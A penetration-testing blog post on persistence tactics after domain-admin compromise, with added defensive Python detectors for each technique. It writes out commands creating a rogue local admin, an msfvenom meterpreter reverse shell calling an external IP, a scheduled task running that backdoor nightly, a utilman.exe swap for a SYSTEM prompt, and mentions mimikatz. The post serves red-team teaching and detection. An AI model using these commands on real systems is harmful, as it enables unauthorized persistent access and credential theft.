Home is Where I Upload my Tools - Analyzing Persistence Tactics
In our last phase we escalated our privileges to those of the domain administrator. The next step is to persist on the network by embedding ourselves so deep into the system that they have to burn us out with thermate (seriously, it's real). This is an important step when you have a blue team that actually does their job, and just because you've never run into that unicorn (seriously, it's not real) doesn't mean you can get complacent.
The goal of this phase is to create multiple fallback points so that if one or more are burned by the blue team we still have access to the network. It is important to diversify our persistence points on the network by using multiple methods. There are brute force methods and stealthy methods, and we will use both to ensure our access is not interrupted.
Status of Forces
Currently, blue forces have an active presence on a textbook network with a DMZ and an internal network. The red team has gained access to the internal network, compromised domain administrator credentials and used them to create a domain administrator account of its own. The blue team has recently reset all local administrator accounts and removed our scanner from inside the DMZ. Our pivot into the network is safe and sound on the DNS server and has not attracted any attention because the server fell off the domain long ago and has not been properly maintained or updated with anti-virus signatures.
Initial Tactical Engagement
We begin by articulating our plan to the team so that no one screws up and burns our last grasp on the network. We will start by creating several domain user accounts, a backup domain administrator account, and some local administrator accounts across the network. We will then install several remote access tools across the network that call back to us through the firewall. We will also use some classic persistence methods like replacing Windows utilities with command prompts. There are a few persistence methods we shy away from because this test has already been destructive enough. We will refrain from putting a web shell on their front-facing web server even though it would be super convenient for us. Rootkits, virtual machines running on workstations, and workstations running on hypervisors are all really nice but time consuming, and we can only bill so many hours for this assessment.
The day starts out easy: we move throughout the network with our domain administrator account, adding local administrator accounts on random workstations with ‘net user pentest hack3rsinmynetwork! /add; net localgroup administrators pentest /add’ (typed at a PowerShell prompt, where ‘;’ separates commands; in cmd.exe the separator is ‘&’). Next, we log into the domain controller with our domain administrator account. It's all GUI from here; we are going full Jurassic Park on this network, flying through file directories and double clicking all the way, none of that fancy command line kung fu. We open up Server Manager like a plebeian enterprise manager and then Active Directory Users and Computers. Right click on the folder where we want to place our users and wham baam boozle, we've got three regular domain users and a backup domain administrator in case things go awry. We are professionals, so we emulated the user account naming policies and even placed the accounts in the correct Active Directory groups instead of at the top level. Pro tip: If you don't leave all your tools in c:\tmp, are you even 1337?
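From the other side of the table, the ‘net user /add; net localgroup administrators /add’ pair leaves a very recognizable footprint in the Security log: event 4720 (a user account was created) followed seconds later by event 4732 (a member was added to a security-enabled local group) naming Administrators. The correlation below is an added example, not code from the original post. It works on constructed records shaped like those two events after a SIEM has parsed them and resolved the member SID to an account name (that resolution is an assumption; the raw 4732 event carries a SID).

```python
"""Correlate account creation with local-admin group membership.

Added example, not from the original post. Events are constructed dicts
carrying the fields a SIEM exposes from Windows Security events 4720 (user
account created) and 4732 (member added to a security-enabled local group);
the member is assumed to be resolved to a name rather than left as a SID.
"""
from datetime import datetime, timedelta

ADMIN_GROUP = "Administrators"


def correlate_new_local_admins(events, window=timedelta(minutes=10)):
    """events: dicts with keys time, host, event_id, target, group, subject.

    Returns one alert string per account that was created and then added to
    the local Administrators group on the same host within `window`."""
    created = {}  # (host, account) -> time the 4720 was logged
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        key = (ev["host"], ev["target"].lower())
        if ev["event_id"] == 4720:
            created[key] = ev["time"]
        elif ev["event_id"] == 4732 and ev["group"] == ADMIN_GROUP:
            when = created.get(key)
            if when is not None and ev["time"] - when <= window:
                alerts.append(
                    f"{ev['host']}: new account {ev['target']} created at {when:%H:%M:%S} "
                    f"and made local admin at {ev['time']:%H:%M:%S} by {ev['subject']}"
                )
    return alerts


def constructed_events():
    """Constructed sample: one create-then-elevate pair plus two routine events."""
    t0 = datetime(2018, 3, 1, 10, 22, 5)
    return [
        {"time": t0, "host": "WS-0412", "event_id": 4720, "target": "pentest",
         "group": None, "subject": "CORP\\da.backup"},
        {"time": t0 + timedelta(seconds=2), "host": "WS-0412", "event_id": 4732,
         "target": "pentest", "group": ADMIN_GROUP, "subject": "CORP\\da.backup"},
        # Helpdesk adds an existing user to a non-admin group: no alert.
        {"time": t0 + timedelta(minutes=5), "host": "WS-0077", "event_id": 4732,
         "target": "jsmith", "group": "Remote Desktop Users", "subject": "CORP\\helpdesk1"},
        # A new account that is never elevated: no alert either.
        {"time": t0 + timedelta(hours=1), "host": "WS-0090", "event_id": 4720,
         "target": "contractor7", "group": None, "subject": "CORP\\helpdesk1"},
    ]


if __name__ == "__main__":
    for line in correlate_new_local_admins(constructed_events()):
        print(line)
```

The ten-minute window is deliberately generous; the scripted version of this lands both events within the same second, and a human doing it through the GUI still takes well under a minute.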
Remote access tools are incredibly useful if you can get your hands on one or even program one. We are going to start off simply, by creating a meterpreter payload with a calc.exe template and encoding because we know the host network has anti-virus installed, so…
‘msfvenom --payload windows/meterpreter/reverse_tcp lhost=18.104.22.168 lport=80 -e x86/shikata_ga_nai -i 3 -x ./calc.exe -f exe -o definitely_not_a_backdoor.exe’.
We will upload this to the domain controller and set it as a scheduled task with…
‘$trigger = new-scheduledtasktrigger -daily -at 1am; $action = new-scheduledtaskaction -execute "definitely_not_a_backdoor.exe"; $principal = New-ScheduledTaskPrincipal -userid "\pentest" -runlevel highest; $settings = New-ScheduledTaskSettingsSet; $newtask = new-scheduledtask -Action $action -principal $principal -trigger $trigger -settings $settings; register-scheduledtask backdoor -inputobject $newtask’.
This will give us a fresh meterpreter session every night at 1 AM.
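Everything that PowerShell line registers ends up in one XML document, and that document is what a responder actually reads, either from C:\Windows\System32\Tasks or from the TaskContent field of Security event 4698 (a scheduled task was created). The audit below is an added example, not code from the original post: it parses a task definition and flags the traits that make this one stand out (an executable with no path, RunLevel set to HighestAvailable, a named account instead of a service identity, and a daily trigger in the middle of the night). Both task definitions in it are constructed, modelled on what the line above would produce.

```python
"""Audit a Task Scheduler definition for common persistence traits.

Added example, not part of the original post. It parses the task XML that
Register-ScheduledTask writes (the same XML Security event 4698 carries in
TaskContent) and reports an action with no trusted path, elevated RunLevel,
a named user rather than a service identity, and a daily trigger at an odd
hour. Both task definitions below are constructed samples.
"""
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Directories an ordinary scheduled task's executable is expected to live in.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
SERVICE_IDENTITIES = ("S-1-5-18", "S-1-5-19", "S-1-5-20", "NT AUTHORITY\\", "SYSTEM")


def _text(node, path):
    found = node.find(path, NS)
    return (found.text or "").strip() if found is not None else ""


def audit_task(task_xml):
    """Return a list of finding strings for one task definition; empty means nothing odd."""
    root = ET.fromstring(task_xml)
    findings = []
    for exe in root.findall("t:Actions/t:Exec", NS):
        cmd = _text(exe, "t:Command").strip('"').lower()
        if "\\" not in cmd:
            findings.append(f"action has bare executable name, resolved via PATH: {cmd}")
        elif not cmd.startswith(TRUSTED_PREFIXES):
            findings.append(f"action executes from non-standard directory: {cmd}")
    for principal in root.findall("t:Principals/t:Principal", NS):
        user = _text(principal, "t:UserId")
        if _text(principal, "t:RunLevel") == "HighestAvailable":
            findings.append(f"runs elevated (HighestAvailable) as {user or 'unknown'}")
        if user and not user.upper().startswith(SERVICE_IDENTITIES):
            findings.append(f"runs as a named account rather than a service identity: {user}")
    if root.find("t:Triggers/t:CalendarTrigger/t:ScheduleByDay", NS) is not None:
        start = _text(root, "t:Triggers/t:CalendarTrigger/t:StartBoundary")
        if len(start) >= 16:
            hour = int(start[11:13])
            if hour < 6 or hour >= 22:
                findings.append(f"daily trigger outside business hours at {start[11:16]}")
    return findings


# Constructed: roughly what the post's Register-ScheduledTask line produces.
SUSPICIOUS_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2018-03-01T01:00:00</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>\\pentest</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec><Command>definitely_not_a_backdoor.exe</Command></Exec>
  </Actions>
</Task>"""

# Constructed: a routine maintenance task that should produce no findings.
BENIGN_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2018-03-01T12:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>LeastPrivilege</RunLevel></Principal>
  </Principals>
  <Actions Context="Author">
    <Exec><Command>C:\\Windows\\System32\\defrag.exe</Command><Arguments>C: /O</Arguments></Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml_text in (("suspicious", SUSPICIOUS_TASK_XML), ("benign", BENIGN_TASK_XML)):
        print(name, "->", audit_task(xml_text) or "no findings")
```

None of the four findings is damning on its own (plenty of vendor tasks run as HighestAvailable), which is why the audit returns all of them and leaves the scoring to whoever reads the list; a bare executable name plus a 1 AM trigger plus an account nobody in the room recognizes is the combination that got this one cleaned.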
In our drive for persistence across the network, we access several workstations and servers and replace the Ease of Access tool, c:\windows\system32\utilman.exe, with a command prompt. By renaming the Ease of Access binary (always rename it to utilman.exe.bkp so you can clean up after yourself) and copying a command prompt to the same location, we are able to remote into any computer and, at the logon screen, click the Ease of Access button to be handed a SYSTEM prompt (https://laconicwolf.com/2016/02/25/the-sethc-backdoor/). This trick can also be used to recover the locked-out computers of friends and relatives during the holidays when you are conscripted as the family's tech support.
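The swap is also easy to check for, because a copied cmd.exe is byte-identical to the real one and the polite "rename it to .bkp" habit leaves the original sitting right next to it. The checker below is an added example, not from the original post; it hashes each accessibility binary reachable from the logon screen, compares it against cmd.exe, and reports leftover .bkp files. On a live host you would point it at C:\Windows\System32; the directory it builds for itself is a constructed stand-in with fake file contents so the example runs anywhere.

```python
"""Check the logon-screen accessibility binaries for a swapped-in cmd.exe.

Added example, not part of the original post. On a real host pass
C:\\Windows\\System32; build_constructed_system32() creates a throwaway
directory with fake contents that imitates the utilman.exe swap.
"""
import hashlib
import os
import tempfile

# Binaries launchable from the logon screen; every one is a candidate for the swap.
ACCESSIBILITY_BINARIES = ("utilman.exe", "sethc.exe", "osk.exe", "narrator.exe",
                          "magnify.exe", "displayswitch.exe")


def sha256_of(path):
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def check_accessibility_binaries(system32):
    """Return finding strings for binaries identical to cmd.exe or with a .bkp twin."""
    findings = []
    cmd_hash = sha256_of(os.path.join(system32, "cmd.exe"))
    for name in ACCESSIBILITY_BINARIES:
        path = os.path.join(system32, name)
        if not os.path.exists(path):
            continue
        if sha256_of(path) == cmd_hash:
            findings.append(f"{name} is byte-identical to cmd.exe")
        if os.path.exists(path + ".bkp"):
            findings.append(f"{name}.bkp present: original renamed aside")
    return findings


def build_constructed_system32():
    """Constructed test directory: utilman.exe replaced by a copy of cmd.exe,
    the original parked as utilman.exe.bkp, sethc.exe left alone."""
    directory = tempfile.mkdtemp()
    contents = {
        "cmd.exe": b"CONSTRUCTED-CMD-BYTES",
        "utilman.exe": b"CONSTRUCTED-CMD-BYTES",
        "utilman.exe.bkp": b"CONSTRUCTED-UTILMAN-BYTES",
        "sethc.exe": b"CONSTRUCTED-SETHC-BYTES",
    }
    for name, data in contents.items():
        with open(os.path.join(directory, name), "wb") as f:
            f.write(data)
    return directory


if __name__ == "__main__":
    for line in check_accessibility_binaries(build_constructed_system32()):
        print(line)
```

Matching against cmd.exe catches exactly the variant described here; a replacement that is some other binary slips past it, so in practice pair this with a check that each file's Authenticode signature and version resource still name the expected component, or simply compare against the copy in WinSxS.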
The most important part of the persistence phase is to remember to keep a list of the methods and places you used them so that you can clean up after yourself once the assessment has ended. Lord knows the blue team is not going to implement changes outlined in your report that would render your persistence methods ineffective. Always assume the worst of the blue team and you will never be surprised.
Adversary Counter Response
The blue team thinks they are doing a bang-up job at this point. They've successfully scrubbed the network of our presence multiple times and cleaned up several intrusions. We've managed to slip by undetected up until this point and we are currently living off the land. By living off the land, we mean that we are using legitimate network accounts and legitimate commands to make configuration changes to the network. Generally speaking, if you've made it this far, very few blue teams are equipped and knowledgeable enough to stop you. Congratulations, you win … but we will go over some adversary counter actions that may catch you up at this point, just in case the blue team decides to hire an incident response team to come in and use all their fresh brainpower that hasn't grown stale in the basement of this corporation.
The incident response team are the heavies in the war on hackers. They are what the blue team aspires to be in the climb up the corporate ladder. They are only dispatched when the blue team has failed so miserably that it becomes apparent to management, and we all know how blue teams like to sweep their incompetence under the rug (if you haven't guessed by now, I'm a little hard on blue teams). The incident responders roll in with their kit and set up shop. The first thing they do is analyze network traffic looking for suspicious callouts. One of the first things they notice is that a computer is calling out to a website at 1 AM every morning. This tells them that the computer is compromised. As they investigate it, they look through the common persistence indicators and find that we've scheduled a task to execute at that time. It is cleaned up along with the backdoor program.
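The "calling out at 1 AM every morning" observation is a detection you can write down rather than just eyeball. The function below is an added example, not code from the original post: given outbound connection records of the kind a flow collector or firewall log provides, it groups them by source, destination and port, measures the gaps between successive connections, and reports any pair whose gaps are nearly constant. The connection records it runs on are constructed, with documentation-range addresses standing in for the callback server.

```python
"""Flag hosts that call out on a fixed schedule.

Added example, not part of the original post. Input is a constructed list of
outbound connection records (timestamp, source, destination, port). For each
source/destination pair the gaps between successive connections are measured;
a task firing at 01:00 nightly yields gaps of 86400 s with almost no jitter,
while a person browsing the same site does not.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev


def find_periodic_callouts(records, min_connections=4, max_jitter_ratio=0.02):
    """records: iterable of (datetime, src_ip, dst_ip, dst_port).

    Returns {(src, dst, port): period_seconds} for pairs whose inter-connection
    gaps deviate from their mean by no more than max_jitter_ratio."""
    by_pair = defaultdict(list)
    for ts, src, dst, port in records:
        by_pair[(src, dst, port)].append(ts)
    periodic = {}
    for pair, times in by_pair.items():
        if len(times) < min_connections:
            continue  # too few samples to call anything a schedule
        times.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]
        period = mean(gaps)
        if period > 0 and pstdev(gaps) / period <= max_jitter_ratio:
            periodic[pair] = round(period)
    return periodic


def constructed_records():
    """Constructed sample: one workstation beaconing nightly at 01:00 with a
    couple of seconds of jitter, another browsing a site at human hours."""
    first_beacon = datetime(2018, 3, 1, 1, 0, 0)
    beacons = [(first_beacon + timedelta(days=i, seconds=i % 3), "10.0.1.25", "203.0.113.5", 80)
               for i in range(5)]
    browsing = [
        (datetime(2018, 3, 1, 9, 14, 3), "10.0.1.40", "203.0.113.80", 443),
        (datetime(2018, 3, 1, 9, 15, 50), "10.0.1.40", "203.0.113.80", 443),
        (datetime(2018, 3, 1, 11, 2, 11), "10.0.1.40", "203.0.113.80", 443),
        (datetime(2018, 3, 2, 16, 48, 0), "10.0.1.40", "203.0.113.80", 443),
        (datetime(2018, 3, 3, 8, 5, 30), "10.0.1.40", "203.0.113.80", 443),
    ]
    return beacons + browsing


if __name__ == "__main__":
    for (src, dst, port), period in find_periodic_callouts(constructed_records()).items():
        print(f"{src} -> {dst}:{port} every {period} s ({period / 3600:.1f} h)")
```

A fixed daily trigger is the easy case; the same jitter ratio also catches a tool checking in every few minutes, and it is exactly why the debrief below settles on operating only during business hours, when a connection blends into everything else the host is doing.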
The incident responders realize that a domain controller was compromised and whip their massive unit out on the table and demand that the blue team implement account resets for everyone on the network. The blue team manager tells the incident response team to fuck right off; doing that a couple of days ago nearly cost him his job. There is hostility in the air and we now have a pissing contest between middle managers. After a bunch of dick swinging, the blue team agrees to reset the passwords of all the domain administrators and allow the domain users to remain compromised by the penetration testers rather than going through the pain of telling the CEO that more account resets are required. It is at this point that the incident responders pull out their greatest tool yet, an Excel spreadsheet where they check off that every domain administrator has reset their password manually. Soon they get to an account that does not have a response from a domain administrator in the room. They disable the account and shake their heads at the blue team.
The incident response team wraps up its investigation and its collaboration with the ungrateful blue team it just upstaged. Lucky for us, this dysfunction pushed the heavy hitters off the network before they discovered our other two forms of persistence: the local administrator accounts and the utilman.exe replacement.
During the debrief we discuss the removal of the domain administrator accounts and the loss of the backdoor on the domain controller. We explore why they were removed and how to avoid it in the future. We plan to access the network only during business hours from now on. Additionally, we can focus our efforts on compromising known good accounts and leaving their passwords unchanged. We will focus on exploiting domain administrator workstations and pulling cleartext passwords out of memory with mimikatz. This way, we will have access to legitimate domain administrator accounts, and obviously fake accounts will not stand out on a list of domain administrators.
The planning begins for the effects phase. How are we going to use all of this beautiful access to make a living hell for our customer and ensure that we are brought back year after year? Will we set a rule to Cc the CEO's wife on all the steamy emails he sends to his secretary, or will we put backdoors into the software the company is developing? Tune in next time to see the thrilling conclusion of our assessment, the effects phase.